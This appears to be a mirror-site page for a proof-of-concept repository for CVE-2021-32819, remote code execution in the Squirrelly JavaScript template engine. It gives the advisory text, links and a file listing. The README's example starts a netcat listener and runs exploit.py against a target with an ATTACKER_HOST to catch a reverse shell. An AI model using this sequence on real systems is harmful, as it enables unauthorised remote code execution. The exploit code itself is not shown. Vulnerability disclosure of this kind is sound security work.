CVE-2021-32819 PoC — Remote code execution in squirrelly

Source

https://github.com/Abady0x1/CVE-2021-32819

Associated Vulnerability

Title:Remote code execution in squirrelly (CVE-2021-32819)
Description:Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.

Description

SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

Readme

# CVE-2021-32819
CVE-2021-32819 : SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

### Source
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
### Analysis
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
### squirrelly
v8.0.0 >= v8.0.8 Remote Code Execution
### Environment
Ubuntu 20.04.1

### Example
```
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443
```

![Proof of concept](https://raw.githubusercontent.com/Abady0x/CVE-2021-32819/main/img/POC.png)

File Snapshot


 [4.0K]  /data/pocs/c59b8ca8881bae6749d4969678ca2dde870c76ef
├── [ 809]  exploit.py
├── [4.0K]  img
│   └── [ 58K]  POC.png
└── [ 676]  README.md

1 directory, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!